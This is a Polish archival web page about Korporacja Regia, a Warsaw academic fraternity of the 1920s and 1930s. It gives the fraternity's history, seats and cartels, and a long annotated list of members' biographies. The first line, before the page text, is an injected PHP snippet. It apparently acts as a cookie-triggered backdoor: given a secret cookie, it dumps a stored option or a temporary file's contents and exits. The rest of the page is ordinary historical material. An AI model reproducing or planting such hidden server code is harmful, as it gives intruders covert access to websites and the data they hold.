if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Regia

Dekiel Józefa Kraczkiewicza. Nazwa:
Korporacja Regia
Siedziba:
Warszawa
Data powstania:
luty 1924 r. (1923 r. ?)
Barwy:
purpurowa – złota – biała
Dewiza:
„Moribus antiquis” („Wedle starych obyczajów”)

Rys historyczny

Regia, Warszawa 1927 r.

Regia powstała w lutym 1924 r. (1923 r. ?). Szczególnym rysem Korporacji było kultywowanie polskich tradycji rycerskich. W dniu 5 V 1924 r. Regia została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 5 V 1924 r.). Kandydowała pod opieką Jagiellonii. Prawa członka rzeczywistego uzyskała w 1925 r. W latach 1933-38 pozostawała poza strukturami Związku. W 1924 r. powstał Związek Filistrów.

Regia zawarła dwa kartele: dnia 12 V 1924 r. na cztery lata z K! Corona z Poznania (wypowiedziany przez K! Corona w 1929 r. ?) oraz dnia 21 II 1927 r. z K! Corolla.

Siedziby Regii mieściły się kolejno przy: ul. Królewskiej 7/6 (1924/25), ul. Boduena 2/7 (1925/26), ul. Czackiego 9/1 (1927/28), ul. Karowej 5/39 (1928/29), ul. Nowy Świat 22/44 (1929/30 i 1930/31), ul. Wilanowskiej 8/25 (1931/32) oraz ul. Krakowskie Przedmieście 32 w b. pałacu Potockich (1932/33).

Całkowita ustalona, choć bardzo niekompletna imienna lista członków Regii obejmuje 74 nazwiska, w tym jednego członka honorowego (wykaz obejmuje jednak niemal wyłącznie osoby aktywne w latach 1924-33).

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.

Lista członków

Poniższa, niekompletna lista członków Regii obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Jan Rostafiński, 1927 r.

 1. Jan Rostafiński, (13 lutego 1882 w Krakowie - 6 lipca 1966 w Warszawie) s. Józefa, absolwent Gimnazjum oo. Jezuitów w Chyrowie 1901, student rolnictwa i fizjologii UJ, doktorat UJ 1907, student Akademii w Bonn-Poppelsdorf, zootechnik, organizator hodowli bydła, trzody chlewnej i owiec, prof. nadzw. i kierownik Katedry Hodowli Zwierząt SGGW, dziekan Wydziału Rolnego SGGW 1922/23, prof. zw. 1935, Filister honorowy Regii, członek PAU, przewodniczący warszawskiego oddziału Polskiego Towarzystwa Przyrodników, członek Komisji Rolnej PAU, Komitetu Nauk Zootechnicznych PAN, członek korespondent Akademii Nauk Rolniczych w Helsinkach, członek rady Międzynarodowego Instytutu Rolniczego w Rzymie, działacz społeczny m.in. prezes zarządu Polskiego Związku Byłych Więźniów Ideowo-Politycznych, członek Rady Naczelnej ZBOWiD, członek Rady Głównej PCK, współzałożyciel Towarzystwa Przyjaźni Polsko-Fińskiej, w czasie wojny więzień obozu koncentracyjnego w Stutthofie 1944-45, w okresie stalinowskim wysłany na przymusową emeryturę, pochowany na warszawskich Powązkach, odznaczony m. in. Komandorią „Białej Róży” finlandzkiej i Krzyżem Komandorskim OOP

Członkowie rzeczywiści

  Seweryn Abramowicz, 1927 r.

 1. Seweryn Abramowicz-Burnak, akt. 1924-26

 2. M. Burczak-Abramowicz,
  Seweryn Abramowicz

  Witold Bielecki.

 3. Witold Bielecki, (17 marca 1906 - wrzesień 1939) student WSH, c. 1925, akt. 1925-32, prezes sem. zim. 1928/29, prezes sem. let. 1928/29, I wiceprezes sem. let. 1929/30, oficer rez., zmobilizowany w 1939, uczestnik wojny obronnej 1939, zginął w nieustalonych okolicznościach w walce z Sowietami

 4. Stanisław Bielski, (22 października 1903 w Morgach w woj. białostockim - 1940 w Katyniu) s. Ignacego i Stefanii z Prytułłów, absolwent leśnictwa SGGW, c. 1928, akt. 1928-33, po studiach komisarz ochrony lasów państwowych w Sieradzu, por. rez. 81 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 5. Tadeusz Bielski, student UP (?), student UW, c. 1925, akt. 1925-28
 6. Szczepan Boski, ( - 1942) rozstrzelany przez Niemców

  Zygmunt Brudziński (senior), 1927 r.

 7. Zygmunt Brudziński (senior), filister założyciel

  Zygmunt Brudziński (junior), 1927 r.

 8. Zygmunt Brudziński (junior), student SGGW, akt. 1924-28, olderman sem. let. 1924/25, prezes sem. let. 1927/28, olderman sem. zim. 1932/33 (jako filister)

 9. Mieczysław Budny, akt. 1924/25
 10. Chołomski, po wojnie na emigracji w Austrii
 11. Bolesław Chołoniewski, (1907 - 1942/3) brat Mieczysława (Corona, Regia), student UW, akt. 1932

  Mieczysław Chołoniewski, 1927 r.

 12. Mieczysław Chołoniewski, (1905-1977) brat Bolesława (Regia), student UP 1924-25, c. 1924/25 Corona, student UW 1925-33, c. 1925 Regia, akt. 1925-33, sekretarz sem. let. 1927/28, sekretarz sem. zim. 1928/29, prezes sem. zim. 1932/33 (jako filister), wiceprezes WKM-u sem. let. 1931/32, prawnik, adwokat

 13. Stefan Chrzanowski, akt. 1924/25, prezes sem. zim. 1924/25

  Andrzej Cywiński, prawd. początek lat 30-tych.

 14. Andrzej Cywiński, (1909 w maj. Kamień k. Opola Lubelskiego - 1936 w Warszawie) herbu Puchała, s. Stanisława i Anny z Grodzińskich, absolwent Gimnazjum im. Mikołaja Reja w Warszawie (?), student prawa UW, student SGGW (1929), student WKZ (Lwów, 1930), c. 1927, akt. 1927-33, po studiach współgospodarował maj. Kamień, zmarł śmiercią tragiczną w pożarze pokoju w hotelu “Britol” w Warszawie, pochowany w Kamieniu

 15. Witold Czeczott, akt. 1924-26

  Mieczysław Czyhiryn, 1927 r.

 16. Mieczysław Czyhiryn, akt. 1925-26

 17. Roman Stanisław Dąbrowski, (1 maja 1908 w Warszawie - 1940 w Katyniu), s. Władysława i Elżbiety z Rakowieckich, student i absolwent 1932 WSH, c. 1931, akt. 1931-33, po studiach współzałożyciel Spółki Rolniczo-Handlowej w Rawie Mazowieckiej, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1933, ppor. rez. KOP, w niewoli sowieckiej, zamordowany przez NKWD

  Michał Dobrzyński, 1927 r.

 18. Michał Dobrzyński, (27 września 1900 w Turku - 1940 w Charkowie), s. Stanisława i Eugenii z Nieżychowskich, żołnierz I Korpusu Polskiego gen. Józefa Dowbor-Muśnickiego, uczestnik wojny polsko-rosyjskiej w szeregach 64 Pułku Piechoty, student PW, akt. 1924-26, wiceprezes sem. zim. 1924/25, pracował w Banku Gospodarstwa Krajowego, por. rez. 1 Pułku Piechoty Legionów, w wojnie obronnej 1939 ranny w Równem, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Krzyżem Zasługi, Medalem 1918-1921 oraz Medalem Dziesięciolecia

  Jerzy Falkowski (Falkiewicz ?), 1927 r.

 19. Jerzy Falkiewicz (Falkowski ?), student PW, c. 1927, akt. 1927-28

  Józef Fiszer, 1927 r.

 20. Józef Fiszer, student SGGW, akt. 1927-33

 21. Ryszard Gerlicz, student PW, c. 1928, akt. 1928-30

  Kazimierz Giebułtowski, 1927 r.

 22. Kazimierz Giebułtowski, student SGGW, WSH, a w końcu SNP, akt. 1924-33

 23. Aleksander Grodecki, student SGGW, c. 1930, akt. 1930-33

  Marceli Harlingh, 1927 r.

 24. Marceli Harlingh, student WSH, akt. 1924-30

  Jerzy Jełowicki, 1927 r.

 25. Jerzy Jełowicki, akt. 1924-26

  Stanisław Janiszewski, 1927 r.

 26. Stanisław Janiszewski, student PW, c. 1927, akt. 1927-30

 27. Bolesław Karpiński, student WSH, c. 1928, akt. 1928/29
 28. Zygmunt Konderski, student UW, c. 1932, akt. 1932-33
 29. Stanisław Korzybski-Habdank, (8 sierpnia 1907 w Warszawie - 1940 w Katyniu) s. Andrzeja i Ireny z Rudnickich, student i absolwent prawa UW, c. 1927, akt. 1927-33, sędzia, absolwent Szkoły Podchorążych Rezerwy w Grudziądzu 1931, por. rez., przydzielony do 1 Pułku Szwoleżerów, w niewoli sowieckiej, zamordowany przez NKWD

  Marjan Kowerski, 1927 r.

 30. Marjan Kowerski, student PW, akt. 1924-28, sekretarz sem. zim. I sem. let. 1924/25, wiceprezes sem. let. 1925/26, po studiach pracował w zakładach zbrojeniowych

  Józef Kraczkiewicz, 1934 r.

 31. Józef Kraczkiewicz, (7 czerwca 1901 w Pohrebyszczach na Kijowszczyźnie - 27 maja 1959 w Katowicach) s. Bolesława Tomasza i Karoliny z Sawickich, bratanek Juliana, Ignacego i Kazimierza (wszyscy Arkonia), brat stryjeczny Franciszka (Arkonia), absolwent Gimnazjum Polskiego w Kijowie 1919, student 1920-24 i absolwent (inż. rolnik) 1924 SGGW, akt. 1924-26, po studiach zarządzał licznymi majątkami, m.in. maj. Żygląnd Jerzego Zdziechowskiego na Pomorzu 1926-30, maj. Cielętniki Stefana Steihagena w pow. radomszczańskim 1930-37, od 1932 prowadził także z ramienia Zakładów Wyrobów Włókienniczych “Stradom” w Częstochowie plantację lnu, a ponadto zajmował się zakupem lnu na potrzeby tych Zakładów 1937-39, w czasie wojny administrował maj. Szczekociny Jana Ciechanowskiego 1939, był dyrektorem rolnym ordynacji ks. Czartoryskich 1940-42 oraz prowadził maj. Jeleniów Zofii Konarskiej w Świętokrzyskim 1943-44, po wojnie pracował m.in. w “Samopomocy Chłopskiej” oraz był biegłym rzeczoznawcą Państwowej Inspekcji Handlowej

 32. Jan Kazimierz Krasicki, (1875 w Malczewie - 1 września 1936 w Warszawie) z Sicina, s. Józefa i matki z d. Lutomska, ojciec Jana i Kazimierza (obaj Regia), stryj Michała (Corolla), filister założyciel

  Jan Kanty Krasicki, prawd. po 1945 r.

 33. Jan Kanty Maria Krasicki, (2 stycznia 1908 w Zakopanym - 17 marca 1986 w Warszawie) s. Jana Kazimierza (Regia) i Marii z Kleszczyńskich, brat Kazimierza (Regia), kuzyn Michała (Corolla), absolwent Gimnazjum im. Adama Mickiewicza w Warszawie 1925, student i absolwent rolnictwa SGGW 1925-31, c. 1925, akt. 1925-30, olderman sem. zim. 1928/29, przewodniczący Sądu Koleżeńskiego Bratniej Pomocy i Koła Rolników SGGW, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1929/30, po studiach administrator maj. Targowisk k. Siemiatycz oraz kompleksu rolno-leśnego Koryciny-Siemiony, w wojnie obronnej 1939 m.in. w zgrupowaniu “Polesie”, aresztowany przez Niemców w październiku 1939 w Sochaczewie trafił do oflagu IIB Arnswalde i IID Grossborn, Stalagu XB w Sandbostel, po wyzwoleniu komendant obozu Ostrauderfehn, w końcu 1945 wrócił do kraju, pracował m.in. przy organizacji szkół rolniczych w woj. warszawskim 1946-47, jako naczelnik Wydziału Organizacyjnego Gospodarczych Instytutów Naukowych w Ministerstwie Rolnictwa i Reform Rolnych 1948-50, jkako kierownik Działu Planowania Centralnego Instytutu Rolniczego 1951-54, sekretarz naukowy Komitetu Nauk Rolniczych, a następnie kierownik Biura Wydziału Nauk Rolniczych i Leśnych PAN 1954-74, pracownik Zespołu Koordynującego PL-480 (współpraca z Departamentem Rolnictwa USA), pochowany na Cmentarzu w Wólce Węglowej

 34. Józef Kanty (Józef Konstanty ?) Krasicki, (?)

  Kazimierz Krasicki, 1927 r.

 35. Kazimierz Krasicki, (4 stycznia 1906 w Kolędzianach k. Czortkowa - 16 grudnia 2000 w Nowym Jorku) s. Jana Kazimierza, brat Jana (obaj Regia), kuzyn Michała (Corolla), absolwent Gimnazjum E. Konopczyńskiego im. Adama Mickiewicza w Warszawie, student i absolwent prawa 1932 UW, absolwent paryskiej Ecole des Sciences Politiques 1927, c. Regia 1925 (?), akt. 1925-32, dyplomata, pracownik konsulatu w Brukseli 1933-36, konsul w Nowym Jorku 1939-45, po wojnie pozostał na emigracji w Stanach Zjednoczonych, pracował w firmie American Express 1946-71, działacz emigracyjny zaangażowany w pomoc polskim emigrantom, w 1939 przekazał nowemu konsulowi w Nowym Jorku pieczęć przedwojennego konsulatu, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, pochowany w grobie rodzinnym na Cmentarzu Rakowickim Krakowie

 36. Kułakowski,
 37. Michał Lipczyński, student WSH, c. 1927, akt. 1927-33
 38. Jarosław Łuba, akt. 1924-28, prezes sem. let. 1925/26

  Wiesław Macierakowski, 1927 r.

 39. Wiesław Macierakowski, student WSH, c. 1927, akt. 1927-33

 40. Stanisław Majkowski, student UW, c. 1932, akt. 1932-33
 41. Janusz Massalski, student SGGW, c. 1930, akt. 1930-32

  Adam Mielżyński, 1927 r.

 42. Adam Mielżyński, student WSH, student UP 1930, akt. 1924-33

 43. F. Mielżyński,
 44. Juljusz Mierzejewski, student UW, c. 1929, akt. 1929-33
 45. Jerzy Miklaszewski, c. 1925, akt. 1925-33
 46. Wojciech Morawski, student SGGW, student Akademii Rolniczej w Czechosłowacji, c. 1927, akt. 1927-33
 47. Tadeusz Piętka, student SGGW, c. 1928, akt. 1928-33

  Rowmund Piłsudski, 1927 r.

 48. Rowmund Piłsudski, (13 lutego 1903 w Warszawie - 5 grudnia 1988 w Londynie) absolwent Szkoły Morskiej w Tczewie, student PW, akt. 1924-32, prezes sem. let. 1924/25, olderman sem. let. 1927/28, olderman sem. zim. 1931/32, po 1926 prezes akademickiej Myśli Mocarstwowej i Legii Mocarstwowej, po wojnie na emigracji w Wielkiej Brytanii, przywódca emigracyjnego Polskiego Ruchu Wolnościowego “Wolność i “Demokracja”, zwolennik federalizmu europejskiego i światowego, bohater książki Rafała Juchnowskiego pt. “Rowmund Piłsudski 1903-1988. Koncepcje polityczne i społeczne” (Wrocław 2009)

 49. Korwin (?) Piotrowski,
 50. Jerzy Rayski, student SGGW, c. 1930, akt. 1930-32, sekretarz sem. zim. 1932/33

  Jan Ruszkowski, 1927 r.

 51. Jan Ruszkowski, student PW, c. 1925, akt. 1925-33

 52. Stefan Sadkowski, student PW, c. 1931, akt. 1931-33
 53. Tadeusz Schuch, (4 czerwca 1912 w Warszawie - 9 maja 1975 w Zakopanym) wnuk Floriana (Arkonia), student PW, c. 1932, akt. 1932-33

  Michał Skarzyński, 1927 r.

 54. Michał Skarzyński, student SGGW, akt. 1924-33, sekretarz sem. let. 1925/26

  Wacław Skarzyński, 1927 r.

 55. Wacław Skarzyński, student SGGW, akt. 1924-33

 56. Oskar Słaboszewicz, brat Andrzeja (Corona), student UW, student Uniwersytetu we Fryburgu 1928, akt. 1924-30, uczeń Szkoły Podchorążych Rezerwy w Grudziądzu
 57. Janusz Stokowski, student SGGW, student WKZ, c. 1927, akt. 1927-33

  Konstanty Stronczyński, 1927 r.

 58. Konstanty Stronczyński, (1907 - 1986) herbu Prawdzic, s. Karola i Marii z d. Mochlińska, brat Władysława (Regia), szwagier Andrzeja Szweycera (Sarmatia), student PW, akt. 1927-33, wiceprezes sem. zim. i sem. let. 1928/29, wiceprezes sem. zim. 1931/32, II wiceprezes WKM-u sem. let. 1931/32, po wojnie we Włoszech, Wielkiej Brytanii, ok. 1947 wyjechał do Argentyny, gdzie zmarł

  Władysław Stronczyński, 1927 r.

 59. Władysław Stronczyński, (1906 - lipiec 1943) herbu Prawdzic, s. Karola i Marii z d. Mochlińska, brat Konstantego (Regia), szwagier Andrzeja Szweycera (Sarmatia), student SGGW, c. 1925, akt. 1925-33, wiceprezes sem. let. 1927/28, prezes sem. let. 1929/30, sekretarz sem. zim. 1930/31, żołnierz R.A.F. - oblatywacz, zginął w katastrofie lotniczej, cmentarz polskich pilotów w Andower w Wielkiej Brytanii

 60. Tomasz Strzałecki, student UW, c. 1927, akt. 1927-32

  Wacław Szuyski, prawd. przed 1930 r.

 61. Wacław Szuyski, (17 czerwca 1908 we Lwowie - 22 listopada 1979 w Łodzi) z rodziny książęcej będącej gałęzią Rurykowiczów, s. Wacława (ziemianina i senatora) i Aliny z Russockich, absolwent gimnazjum Kistryna we Lwowie, student rolnictwa SGGW (absolutorium 1939), c. 1927, akt. 1927-33, prezes sem. zim. 1930/31, prezes sem. zim. 1931/32, współzałożyciel Legionu Młodych oraz Partii Pracy, redaktor pisma “Jutro Pracy”, urzędnik Generalnego Sekretariatu BBWR 1931-36 oraz Państwowego Funduszu Pracy 1936-39, prywatny sekretarz premiera płk. Walerego Sławka, kandydował do Sejmu, w czasie okupacji w referacie 994 Komendy Głównej AK, w 1945 osiadł w Łodzi, w 1948 zbudował w Poznaniu fabrykę prefabrykatów budowlanych “Superit”, fabryka została wkrótce upaństwowiona, poszukiwany przez UB 1949-55, ukrywał się w Zaborni k. Chabówki i w Warszawie, w 1955 aresztowany, po zwolnieniu przez dwa lata nie mógł znaleźć pracy, później pracował jako zootechnik w podłódzkim gospodarstwie rolnym, następnie jako urzędnik Stacji Sanitarno-Epidemiologicznej Łódź Górna, a w końcu jako kierownik działu Higieny Komunalnej oraz wicedyrektor Wojewódzkiej Stacji Sanitarno-Epidemiologicznej w Łodzi, a także konsultant w Agro Projekcie, odznaczony Złotym Krzyżem Zasługi, pochowany na cmentarzu ewangelickim w Łodzi

 62. Jerzy de de Virion, (23 września 1901 - 1943 w Auschwitz) wnuk Włodzimierza Władysława (Konwent Polonia), s. Adama (Arkonia), kuzyn Józefa (Regia), akt. 1924/25, mgr praw, adwokat, działacz konspiracyjny w Warszawie, aresztowany przez Gestapo, zesłany do Auschwitz, tam zamordowany

  Józef de Virion, 1976 r.

 63. Józef de Virion, (7 listopada 1903 we Lwowie - 10 maja 2003) wnuk Włodzimierza Władysława (Konwent Polonia), s. Włodzimierza (Arkonia) i Leokadii z Ratyńskich, kuzyn Jerzego (Regia), w wojnie polsko-rosyjskiej 1920 ochotnik w 214 Pułku Ułanów, absolwent Gimnazjum Kazimierza Kulwiecia w Warszawie 1922, student 1922-26 i absolwent 1926 prawa UW, dr nauk prawnych Uniwersytetu w Paryżu 1929, c. 1924, akt. 1924-30, ppor. rez. 1 Pułku Ułanów Krechowieckich, od 1930 ekspert prawny w Ministerstwie Wojny, w wojnie obronnej 1939 dowódca szwadronu w 103 Pułku Szwoleżerów na froncie wschodnim, internowany na Litwie, zatrzymany na statku przez marynarkę niemiecką w grudniu 1939 przebywał do 1945 w niemieckich obozach jenieckich w Arnswalde, Gross-Born, Sandbostel i Lubece, radca prawny Polskiej Misji Wojskowej w brytyjskiej strefie okupacyjnej w Niemczech 1945, później radca prawny Zjednoczenia Polskiego w Niemczech oraz radca prawny International Refugee Organization 1945-49, wyemigrował do Kanady, gdzie pracował w kancelarii adwokackiej w Val d’Or 1949-53, prowadził restaurację 1953-56 oraz pracował w YMCA, od 1958 w Stanach Zjednoczonych, pracował jako pomocnik kierownika w klubie społecznym, był członkiem ZNP, Stowarzyszenia Samopomocy Nowej Emigracji, Koła Kawalerii i Artylerii Konnej, Rady Narodowej w Londynie - oddział w Stanach Zjednoczonych, wieloletni delegat do Kongresu Polonii Amerykańskiej na stan Illinois, prezes Koła nr 15 Stowarzyszenia Polskich Kombatantów w Chicago, od 1986 przewodniczący Komitetu Pomocy Polakom na Wschodzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, członek i ostatni przewodniczący Koła Filistrów Polskich Korporacji Akademickich w Chicago, autor tekstu “Polska Korporacja Akademicka Regia” (zob. szerzej Biuletyn Zarządu SFPKA, nr 10, Warszawa 1995, s. 79 i n.), odznaczony m.in. Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, Krzyżem za Udział w Wojnie 1918-1921, Medalem za Udział w Wojnie Obronnej 1939

 64. Tomasz Wichrowski, student WSH, akt. 1928-33 [być może zginął w Powstaniu Warszawskim ?]
 65. Jan Wielowiejski (Wielowieyski), akt. 1924/25
 66. Jerzy Wielowiejski (Wielowieyski), student UW, c. 1927, akt. 1927-32, sekretarz sem. let. 1929/30, I wiceprezes sem. zim. 1932/33, prezes WKM-u sem. let. 1931/32

  Adam Wilden, 1927 r.

 67. Adam Wilden, (1901-1979) student WSH, akt. 1924-33, wiceprezes sem. let. 1924/25

  Stefan Wysocki, 1927 r.

 68. Stefan Wysocki, ( - 1939-45), student WSH, c. 1927, akt. 1927-33, sekretarz sem. let. 1928/29, rozstrzelany przez Niemców

 69. Michał Zawadzki, student WSH, c. 1927, akt. 1927-30, sekretarz sem. zim. 1931/32, II wiceprezes sem. zim. 1932/33, sekretarz WKM-u sem. let. 1931/32
 70. Stefan Zawadzki, student SGGW, student WSH (1932), c. 1930, akt. 1930-33, wiceprezes sem. zim. 1931/32
 71. Włodzimierz Zawadzki, student UW, c. 1927, akt. 1927-33, II wiceprezes sem. let. 1929/30, wiceprezes sem. zim. 1930/31
 72. Stanisław Złotnicki, student WSH, c. 1932, akt. 1932-33
 73. Edmund Żebrowski, student PW, c. 1932, akt. 1932-33

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Regia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VII 2010 r.
Ostatnia zmiana: 22 III 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Regia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 22 III 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }